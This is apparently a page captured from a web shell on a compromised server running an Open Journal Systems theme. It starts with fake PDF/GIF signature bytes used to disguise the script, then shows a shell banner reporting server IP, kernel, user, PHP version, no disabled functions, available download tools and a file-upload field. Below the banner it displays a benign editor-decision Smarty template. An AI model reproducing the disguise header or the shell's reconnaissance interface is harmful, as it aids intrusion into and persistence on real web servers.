%PDF-1.7 GIF89;
| Server IP : 172.66.157.178 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/plugins/themes/PalarJournal/templates/author/submission/ |
Upload File : |
{**
* templates/author/submission/editorDecision.tpl
*
* Copyright (c) 2003-2012 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* Subtemplate defining the author's editor decision table.
*
*}
<div id="editorDecision">
<h3>{translate key="submission.editorDecision"}</h3>
{assign var=authorFiles value=$submission->getAuthorFileRevisions($submission->getCurrentRound())}
{assign var=editorFiles value=$submission->getEditorFileRevisions($submission->getCurrentRound())}
<table width="100%" class="data">
<tr valign="top">
<td class="label">{translate key="editor.article.decision"}</td>
<td>
{if $lastEditorDecision}
{assign var="decision" value=$lastEditorDecision.decision}
{translate key=$editorDecisionOptions.$decision}{if $lastEditorDecision.dateDecided != 0} {$lastEditorDecision.dateDecided|date_format:$dateFormatShort}{/if}
{else}
—
{/if}
</td>
</tr>
<tr valign="top">
<td class="label" width="20%">
{translate key="submission.notifyEditor"}
</td>
<td class="value" width="80%">
{url|assign:"notifyAuthorUrl" op="emailEditorDecisionComment" articleId=$submission->getId()}
{icon name="mail" url=$notifyAuthorUrl}
{translate key="submission.editorAuthorRecord"}
{if $submission->getMostRecentEditorDecisionComment()}
{assign var="comment" value=$submission->getMostRecentEditorDecisionComment()}
<a href="javascript:openComments('{url op="viewEditorDecisionComments" path=$submission->getId() anchor=$comment->getId()}');" class="icon">{icon name="comment"}</a> {$comment->getDatePosted()|date_format:$dateFormatShort}
{else}
<a href="javascript:openComments('{url op="viewEditorDecisionComments" path=$submission->getId()}');" class="icon">{icon name="comment"}</a>{translate key="common.noComments"}
{/if}
</td>
</tr>
<tr valign="top">
<td class="label" width="20%">
{translate key="submission.editorVersion"}
</td>
<td class="value" width="80%">
{foreach from=$editorFiles item=editorFile key=key}
<a href="{url op="downloadFile" path=$submission->getId()|to_array:$editorFile->getFileId():$editorFile->getRevision()}" class="file">{$editorFile->getFileName()|escape}</a> {$editorFile->getDateModified()|date_format:$dateFormatShort}<br />
{foreachelse}
{translate key="common.none"}
{/foreach}
</td>
</tr>
<tr valign="top">
<td class="label" width="20%">
{translate key="submission.authorVersion"}
</td>
<td class="value" width="80%">
{foreach from=$authorFiles item=authorFile key=key}
<a href="{url op="downloadFile" path=$submission->getId()|to_array:$authorFile->getFileId():$authorFile->getRevision()}" class="file">{$authorFile->getFileName()|escape}</a> {$authorFile->getDateModified()|date_format:$dateFormatShort}
<a href="{url op="deleteArticleFile" path=$submission->getId()|to_array:$authorFile->getFileId():$authorFile->getRevision()}" class="action">{translate key="common.delete"}</a><br />
{foreachelse}
{translate key="common.none"}
{/foreach}
</td>
</tr>
<tr valign="top">
<td class="label" width="20%">
{translate key="author.article.uploadAuthorVersion"}
</td>
<td class="value" width="80%">
<form method="post" action="{url op="uploadRevisedVersion"}" enctype="multipart/form-data">
<input type="hidden" name="articleId" value="{$submission->getId()}" />
<input type="file" name="upload" class="uploadField" />
<input type="submit" name="submit" value="{translate key="common.upload"}" class="button" />
</form>
</td>
</tr>
</table>
</div>